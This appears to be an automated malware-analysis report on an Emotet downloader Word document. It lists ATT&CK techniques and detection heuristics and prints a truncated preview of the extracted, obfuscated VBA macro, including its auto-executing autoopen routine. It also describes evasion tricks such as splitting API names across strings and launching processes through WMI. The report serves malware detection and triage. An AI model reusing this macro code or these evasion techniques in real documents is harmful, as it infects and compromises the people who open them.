Verdict: MALICIOUS
Risk Score: 342

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample contains a critical heuristic firing for VBA WMI Win32_Process launcher, indicating the use of WMI to create a process. This is further supported by obfuscation of the 'winmgmts' keyword, a common technique for executing commands. The ClamAV detection and presence of an auto-executing macro (autoopen) strongly suggest this is a downloader for a secondary stage, consistent with the Emotet family.
Heuristics (9)

- ClamAV: Doc.Downloader.Emotet-6961572-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6961572-0
- VBA macros detected [medium, OLE_VBA_MACROS, 5 related findings]: Document contains VBA macro code
- VBA WMI Win32_Process launcher [critical, OLE_VBA_WMI_PROCESS_CREATE]: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals [critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION]: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44337 bytes | be2b8dda27f97598c54de27459106b82b363f4e6ff4d2953d6e17a0769c56a1b |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "V71802"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "P7657_"
Attribute VB_Base = "0{4C695DE2-84B5-49A8-91DD-8839FF13EDCF}{E62D37D0-7405-44B6-9006-096A976823EF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "J5130136"
Attribute VB_Name = "z94122"
Attribute VB_Name = "I7720438"
Attribute VB_Base = "0{B6DEB6FC-14CE-46B5-A430-372DE23CFC7B}{3D78AE48-417A-4B3A-A648-4BC6E3CBCCAD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "O8_2015"
Function D49_9_(d9_8183)
Select Case K5217926
Case E63123 = q_0967
WeekdayName H987788_ + G1816728 + (s79673 / 129707936 + (Y0680749 - Hex(W0484126 - O709307 * A4681_ + Cos(S0520_1 + 347970942 - 378139087))))
Case V5595670 = X1147250
WeekdayName j46084 + i060487 + (c2251_0 / 901160921 + (r407533 - Hex(w71233 - O78589 * n_0758_0 + Cos(D931715 + 575880779 - 850964468))))
End Select
Select Case I473967
Case I68736 = U95_67
WeekdayName L2329_41 + j219429 + (J66488 / 528217205 + (r6897575 - Hex(Z3284098 - Z423494 * a5358288 + Cos(j3_909_ + 16755243 - 804572183))))
Case u15_365 = o206064
WeekdayName Z720264 + O659665 + (n557446 / 752598997 + (U_46264 - Hex(A__7712 - w74232 * E04945_ + Cos(i_1443 + 993300445 - 60226670))))
End Select
Set D49_9_ = CVar(d9_8183)
Select Case a5241025
Case j60735 = n1220329
WeekdayName r_3182 + L54049 + (L1056_25 / 296117980 + (U6034_27 - Hex(d094_2_7 - U_011066 * p9750953 + Cos(G3218222 + 527999036 - 778265212))))
Case W3458926 = i229345
WeekdayName n7083905 + U_27_452 + (c16767 / 11661310 + (w083_636 - Hex(f95301 - c2603_3 * G438916_ + Cos(k22999_ + 874197876 - 301802601))))
End Select
Select Case C29436
Case f05_49 = L1545727
WeekdayName z1251109 + s95394_7 + (w_2_450 / 494886024 + (B355710 - Hex(U262_267 - E867701 * B83513 + Cos(R178680 + 594325131 - 245884163))))
Case L0097089 = r6627313
WeekdayName w36267_ + i_4638 + (u76453 / 937199513 + (E606056 - Hex(z4841_29 - a1463128 * Z178_6 + Cos(c0706581 + 520863803 - 620060203))))
End Select
End Function
Sub autoopen()
Select Case j397139
Case n270751 = T95964_
WeekdayName A09_4050 + B4251_2 + (a1348726 / 48058329 + (X7_58179 - Hex(V9959234 - S0369961 * W5_025 + Cos(i_447114 + 474753483 - 895213213))))
Case v281475 = w7758419
WeekdayName U07866 + H56473 + (R9_671 / 840931557 + (U9__9177 - Hex(f453644 - K8_465 * o58517 + Cos(p2445_ + 711007169 - 978337376))))
End Select
Select Case I659_403
Case b92_91 = d65_5646
WeekdayName z26__75 + b329_4 + (j7_878 / 529024518 + (O31_66 - Hex(M477977 - z9686865 * I856_604 + Cos(R19048_ + 393659947 - 511889138))))
Case S5989_50 = a971990
WeekdayName w45050 + V991_9_ + (j02755 / 659052926 + (N2960296 - Hex(w6598411 - i_7373_ * a091780 + Cos(r7450308 + 260062705 - 31434294))))
End Select
Call t11339
Select Case o15622
Case i48705 = A47_48
WeekdayName j70602 + l625278 + (R98800 / 697982226 + (R61082 - Hex(r64945 - s44915 * w__3798 + Cos(m08599_4 + 975800293 - 807368713))))
Case P1476165 = z97_83
WeekdayName F921674 + c45177 + (v771839 / 683067847 + (w0029548 - Hex(N68491_2 - T30497 * V744085 + Cos(U61803 + 953111394 - 381926048))))
End Select
Select Case i490_3_
Case O318542 = n12837_6
WeekdayName Y646212 + j96_400 + (i__649 / 699906479 + (z23_6_ - Hex(v_9_7498 - N29041 * T7_26900 + Cos(M84767_ + 869708947 - 781327666))))
Case h20_85 = F934870
WeekdayName Y1192558 + k3063408 + (M04051 / 607691626 + (h180359 - Hex(Z85399 - L3_190 * a783520 + Cos(K81481 + 462875308 - 964948561))))
End Sele
```

... (truncated)